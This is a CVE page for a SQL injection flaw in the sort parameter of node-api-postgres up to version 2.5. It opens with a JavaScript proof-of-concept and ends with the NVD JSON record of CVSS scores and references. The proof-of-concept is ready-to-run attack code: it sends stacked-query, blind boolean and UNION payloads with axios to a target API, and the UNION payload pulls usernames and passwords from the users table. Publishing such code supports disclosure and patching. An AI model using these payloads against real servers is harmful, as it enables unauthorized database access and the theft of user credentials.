CVE-2026-4190

// CVE-2026-4190 PoC - SQL Injection in node-api-postgres User.getAll sort parameter // Target: JawherKl node-api-postgres <= 2.5 const axios = require('axios'); // Target configuration const targetUrl = 'http://target-server.com/api/users'; // Basic SQL Injection PoC - Extract database version async function basicInjection() { const maliciousSort = "1; SELECT version();--"; try { const response = await axios.get(targetUrl, { params: { sort: maliciousSort } }); console.log('Response:', response.data); } catch (error) { console.error('Error:', error.message); } } // Blind Boolean-based SQL Injection - Check if admin table exists async function blindInjection() { const trueCondition = "1' AND (SELECT COUNT(*) FROM admin) > 0--"; const falseCondition = "1' AND (SELECT COUNT(*) FROM nonexistent_table) > 0--"; try { const responseTrue = await axios.get(targetUrl, { params: { sort: trueCondition } }); console.log('True condition response:', responseTrue.data); const responseFalse = await axios.get(targetUrl, { params: { sort: falseCondition } }); console.log('False condition response:', responseFalse.data); } catch (error) { console.error('Error:', error.message); } } // Union-based SQL Injection - Extract users table data async function unionInjection() { const unionPayload = "1' UNION SELECT 1,2,3,username,password,6,7,8 FROM users--"; try { const response = await axios.get(targetUrl, { params: { sort: unionPayload } }); console.log('Extracted data:', response.data); } catch (error) { console.error('Error:', error.message); } } // Execute PoC (async () => { console.log('CVE-2026-4190 SQL Injection PoC'); console.log('Target:', targetUrl); console.log('---'); await basicInjection(); await blindInjection(); await unionInjection(); })();

{"cve": {"id": "CVE-2026-4190", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:02.193", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in JawherKl node-api-postgres up to 2.5. This impacts the function User.getAll of the file models/user.js. The manipulation of the argument sort results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad fue detectada en JawherKl node-api-postgres hasta 2.5. Esto afecta la función User.getAll del archivo models/user.js. La manipulación del argumento sort resulta en inyección SQL. El ataque puede ser ejecutado remotamente. El exploit ahora es público y puede ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://hackmd.io/@YzU_KiOzT86cEbFQdBceVg/Bk56LQQYbe", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351097", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351097", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.770001", "source": "[email protected]"}]}}